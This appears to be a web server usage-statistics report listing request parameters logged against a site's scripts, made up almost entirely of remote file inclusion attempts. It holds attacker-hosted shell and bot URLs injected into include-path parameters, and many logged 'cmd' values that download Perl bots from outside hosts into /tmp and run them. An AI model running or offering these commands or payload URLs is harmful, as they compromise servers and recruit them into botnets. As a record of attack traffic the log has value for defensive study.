http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://www.capsoir.com/images/TRA.txt?	16
http://lol123.fileave.com/script9.txt??	15
http://yahwek.dll.googlepages.com/phpbot.txt?	15
Parameter	x
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	22
http://www.fabiofotografo.com.br/js/var.txt??	10
http://201.37.71.117:8090/tool25.txt?	5
http://www.chamala.kit.net/tool25.txt?	4
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://proxysx.t35.com/x0.txt?	4
http://204.11.228.115/id.txt?	4
http://snock.host.sk/php.txt??	3
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	3
http://freewebtown.com/trabalho/CMD.txt?	3
OTHER:	1,200
Script	Total Accesses
/wusage/summary/cgi.html//modules/AllMyGuests/signin.php	1,809
Parameters by Submitted Value
Parameter	_AMGconfig[cfg_serverpath]
Value	Accesses
http://64.22.125.219/r0x/id.txt???	64
http://www.jolieloves.com/mori/cmd.txt?	53
http://189.23.251.131/~tiago/new.txt?	52
http://211.236.244.133/~axlonaxlon/cmd.txt?	26
http://files.myopera.com/Towu614520/files/own.txt?	22
http://www.freewebs.com/yahwek/sete.txt?	20
	19
http://sigbr.servegame.com:8080/mydick.txt?	19
http://own.741.com/mydick.txt?	18
http://www.vsm.gov.tr/pwnd/http.txt??	18
Parameter	_AMGconfig[cfic.php?p
Value	Accesses
http://www.freewebs.com/h1h1h1/p.txt??	5
http://www.freewebs.com/t420/p.txt??	5
http://www.rj2009.kit.net/ddd.txt?	4
http://www.rj2008.kit.net/p.txt??	3
http://www.freewebs.com/playssonn/p.txt??	3
http://www.rj2009.kit.net/p.txt?	2
http://www.rj2009.kit.net/p.txt??	1
http://www.chapolin-ownz.us/inbox.txt?	1
http://www.rj2008.kit.net/perl.txt?	1
http://www.rj2009.kit.net/ddd.txt??	1
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	15
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	10
id	6
uname -a; id	5
cd /tmp;wget http://www.freewebs.com/novoil/acs;curl -O http ://www.freewebs.com/novoil/acs ;perl acs; rm -rf acs; rm -r f acs	3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	3
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet ch http://189.24.38.227/start.txt;lwp-download http://189.24 .38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn x http://189.24.38.227/start.txt;perl start.txt;rm start.txt	3
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	3
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	3
cd /tmp;rm sta.txt;wget http://start.helloweb.eu/botnet/sta. txt;fetch http://start.helloweb.eu/botnet/sta.txt;lwp-downlo ad http://start.helloweb.eu/botnet/sta.txt;curl -O http://st art.helloweb.eu/botnet/sta.txt;lynx http://start.helloweb.eu /botnet/sta.txt;perl sta.txt;rm sta.txt	2
Parameter	list
Value	Accesses
1	10
OTHER:	1,409
Script	Total Accesses
/wusage/weekly//	1,624
Parameters by Submitted Value
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.allforweb.co.kr/data/lang/fatal1.txt??	2
http://www.lazar.ru/manager/processors/min.txt?	2
http://www.kq-china.com/web//plugins/system/id1.txt???	2
http://www.allforweb.co.kr/data/lang/fatal1.txt?	1
Parameter	INCLUDE_FOLDER
Value	Accesses
http://zonadeclientes.com/id1.txt??	2
http://plengeh.co.cc/scripts/id1.txt???	2
http://tstk.org//ktmllite/images/upload/sh1.txt????	1
http://pallmall5.fileave.com/id.txt??	1
http://brandon420.xpg.com.br/bots/id.txt??	1
http://gumansin.com/id.txt??	1
http://www.sunggong.tv/data/shirohige/fxid.txt??	1
http://www.hitler.h17.ru//gallery/1.gif??	1
Parameter	_SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.omsklyvr.omit.ru/id1.txt?	39
http://www.xgamex.org/xgamex/id.txt??	7
http://www.therockcc.org/calendarevents/1.txt?	4
http://rsh.kiev.ua/images/idfx1.txt?	4
http://arch.knu.ac.kr/community/mawar.txt?????	3
http://www.pinoy.ae/uploads/id.txt??	3
http://rinnai.com.sg/backend/app/tmp/banner/fx29id1.txt?????	2
http://www.eduugle.com/CBfibroid/id1.txt?	2
http://www.info-design.fr//language/fonts/id1.txt??	2
http://www.angelcitytrading.com/css/1.txt??	2
Parameter	_zb_path
Value	Accesses
http://www.omsklyvr.omit.ru/id1.txt?	67
http://www.arcoweb.com.br/images/xxx/idxx.txt??	55
http://www.stormpages.com/gogon/copyright.txt????	54
http://gumansin.com/id.txt??	48
http://www.kq-china.com/web//plugins/system/id1.txt??	44
http://dhcom.co.kr/zboard/id.txt??	40
http://www.kq-china.com/web//plugins/system/id1.txt???	23
http://plengeh.co.cc/scripts/id1.txt???	22
http://jeta.co.kr//bbs/component/.jpg/fx29id.txt??	21
http://www.kq-china.com/web//plugins/system/id1.txt?	19
Parameter	act
Value	Accesses
vote	2
http://www.lazar.ru/manager/processors/min.txt?	2
write	2
Parameter	amp;act
Value	Accesses
write	2
Parameter	amp;cid
Value	Accesses
	2
Parameter	amp;mode
Value	Accesses
reply/kboard/kboard.php?board=notice	2
Parameter	amp;no
Value	Accesses
56	2
Parameter	amp;page
Value	Accesses
1	2
OTHER:	1,130
Script	Total Accesses
/wusage/	1,590
Parameters by Submitted Value
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://hist.hongik.ac.kr/zb4pl6/data/teszos?	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.enyzone.cz/components/com_poll/z1??	7
http://pdcmanagement.com///idfx1.gif???	3
http://users4.nofeehost.com/anjrit/fx/id1.txt??	3
http://www.steannareptile.it//administrator/id1.txt??	3
http://www.mama-nsk.ru/fx29id.txt?	3
http://www.fraternidadsinaloense.com/foro/uiu.txt??	2
http://islamicdesigns.askmuslims.com/FX29ID1.txt?	2
http://largeface.com/gnuboard4/gnus/fxid.txt?	1
http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt ??	1
http://arsenal-music.ru/modules/mod_virtuemart_search/_a??	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.leegolf.com/vboard/data/idxx.txt??	3
http://www.usher.co.kr//flvPlay/fx29id.txt?	1
Parameter	GLOBALS
Value	Accesses
	1
Parameter	GLOBALS[binn_include_path]
Value	Accesses
http://datacore.fileave.com/id.txt??	1
Parameter	GLOBALS[mosConfig_absolute_path]
Value	Accesses
http://www.vanderjagt-kraanverhuur.nl/id.txt?	2
Parameter	GOODS[gs_input]
Value	Accesses
deadbeef	13
Parameter	GOODS[no]
Value	Accesses
deadbeef	13
OTHER:	1,526
Script	Total Accesses
/wusage/summary/cgi.html/administrator/components/com_extcal endar/admin_settings.php	1,587
Parameters by Submitted Value
Parameter	CONFIG_EXTADMIN_PATH]
Value	Accesses
http://www.fabiofotografo.com.br/js/var.txt??	21
Parameter	CONFIG_EXT[ADMIN_PATH
Value	Accesses
	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://dlnks.com/z/z/k.txt?	29
http://ownsirc.googlepages.com/botnet.txt?	29
http://invisionar.hostinggratisargentina.com/eth0?	28
http://usuarios.arnet.com.ar/adipasqua/http?	26
http://www.mta.cl/galeria2/galery.txt?	23
http://www.jungo8949.co.kr/tool25.txt?	23
http://208.74.174.183/brizola.txt?	20
http://usuarios.arnet.com.ar/larry123/exploit.txt?	19
http://www.dunakom.hu/userimages/id.txt?	19
http://www.santiagoonline.com.ar/readme.txt?	17
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	15
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
uname -a; id	11
cd /tmp;rm bn.txt;wget http://3sk3nt.by.ru/siemens.txt;fetch http://3sk3nt.by.ru/siemens.txt;lwp-download http://3sk3nt. by.ru/siemens.txt;curl -O http://3sk3nt.by.ru/siemens.txt;ly nx http://3sk3nt.by.ru/siemens.txt;perl siemens.txt	9
id	6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm crew.txt;wget http://eep.br/~gpereira/crew.txt;fe tch http://eep.br/~gpereira/crew.txt;lwp-download http://eep .br/~gpereira/crew.txt;curl -O http://eep.br/~gpereira/crew. txt;lynx http://eep.br/~gpereira/crew.txt;perl crew.txt	5
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	3
Parameter	config_ext[admin_path]
Value	Accesses
	1
Parameter	list
Value	Accesses
1	2
OTHER:	1,258
Script	Total Accesses
/wusage/summary/cgi.html//help.php	1,498
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	14
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	10
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	5
cd /tmp;rm crew.txt;wget http://eep.br/~gpereira/crew.txt;fe tch http://eep.br/~gpereira/crew.txt;lwp-download http://eep .br/~gpereira/crew.txt;curl -O http://eep.br/~gpereira/crew. txt;lynx http://eep.br/~gpereira/crew.txt;perl crew.txt	5
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	63
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	49
http://www.capsoir.com/images/TRA.txt?	26
http://www.neoncomanda.kit.net/tool25.dat?	25
http://usuarios.arnet.com.ar/adipasqua/http?	24
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	18
http://www.pucorp.t5.com.br/lp.txt?	17
http://cestari.angelfire.com/lol.txt?	14
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	13
http://h1.ripway.com/DiegoVirus/pbot.txt?	13
Parameter	css_pathhttp://usuarios.arnet.com.ar/adrikrasnow/rfi/bla.txt ?
Value	Accesses
	2
Parameter	css_pathhttp://www.foto-web.info/phpformmail/injektion.txt?
Value	Accesses
	1
OTHER:	1,144
Script	Total Accesses
/wusage/summary/cgi.html//js/status_image.php	1,491
Parameters by Submitted Value
Parameter	base_url
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	46
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
	22
http://www.neoncomanda.kit.net/tool25.dat?	20
http://www.pucorp.t5.com.br/lp.txt?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	15
http://lol123.fileave.com/script9.txt??	15
http://proxysx.t35.com/x0.txt?	14
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
uname -a; id	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
id	3
Parameter	list
Value	Accesses
1	1
OTHER:	1,189
Script	Total Accesses
/wusage/summary/cgi.html/components/com_sitemap/sitemap.xml. php	1,455
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	10
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	5
id	4
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	3
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	3
cd /tmp;wget http://www.flylink.psi.br/arquivos/..2/4556464; perl 4556464	2
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	2
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www.freewebs.co m/freewebssuxalot/srz.txt;fetch http://www.freewebs.com/free webssuxalot/srz.txt;curl -o http://www.freewebs.com/freewebs suxalot/srz.txt;wget http://www.freewebs.com/freewebssuxalot /srz.txt;perl srz.txt;rm -rf srz.txt	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
Parameter	list
Value	Accesses
1	9
Parameter	mosCoaney.com/wusage/summary/cgi.html/help.php?css_path
Value	Accesses
http://www.digownz.kit.net/pbot1.txt??	9
http://www.rj2009.kit.net/ddd.txt?	6
http://www.rj2008.kit.net/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.freewebs.com/t420/p.txt??	6
http://www.freewebs.com/playssonn/p.txt??	5
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://flaw.we.bs/a.txt?	3
http://www.digownz.kit.net/pbot1.txt?	3
http://www.rj2009.kit.net/burro.txt?	2
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/sur00tseclan/httd.txt?	42
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	21
http://www.freewebs.com/sur00tsecurity/bot.txt?	16
http://usuarios.arnet.com.ar/larry123/http?	15
http://usuarios.arnet.com.ar/larry123/ka.txt?	15
http://ownsparaficar.googlepages.com/funfo.txt?	14
http://usuarios.arnet.com.ar/larry123/exploit.txt?	14
http://www.laila.jp/item_pics/d3rf/teste.txt???????????????? ?????????????	13
http://www.j-vision.co.kr/company/rhe/echo?	12
http://dark4ngel.hostinggratisargentina.com/http?	12
Parameter	mosConfig_http://www.phanom.ac.th/msnlist/id.txt???
Value	Accesses
	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	1,178
Script	Total Accesses
/wusage/summary/cgi.html//setup/header.php	1,453
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
uname -a; id	5
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	45
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.oslutadores.com/?id=23530	28
	22
http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	16
http://lol123.fileave.com/script9.txt??	15
http://bialoka123.fileave.com/script9.txt??	14
Parameter	list
Value	Accesses
1	1
OTHER:	1,153
Script	Total Accesses
/wusage/summary/cgi.html//newspublish/include.php	1,404
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	7
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	5
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	5
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	5
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2 a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp- download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167. 23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	4
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	4
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	4
Parameter	list
Value	Accesses
1	9
Parameter	path5Bdocroot5D
Value	Accesses
http://www.xfactor.altervista.org/php5/id.txt???	2
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	39
http://usuarios.arnet.com.ar/adipasqua/http?	26
http://www.rayzorowns.kit.net/id.txt???	22
http://www.neoncomanda.kit.net/tool25.dat?	18
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	16
http://www.jungo8949.co.kr/tool25.txt?	16
http://claroline.lct-net.cl/id?	16
http://ownsirc.googlepages.com/botnet.txt?	13
http://h1.ripway.com/DiegoVirus/pbot.txt?	10
http://www.freewebs.com/yahwek/phpbot.txt?	9
Parameter	path[docroot]http://usuarios.arnet.com.ar/adrikrasnow/rfi/bl a.txt?
Value	Accesses
	2
OTHER:	1,144
Script	Total Accesses
/wusage/summary/cgi.html/help.php	1,291
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
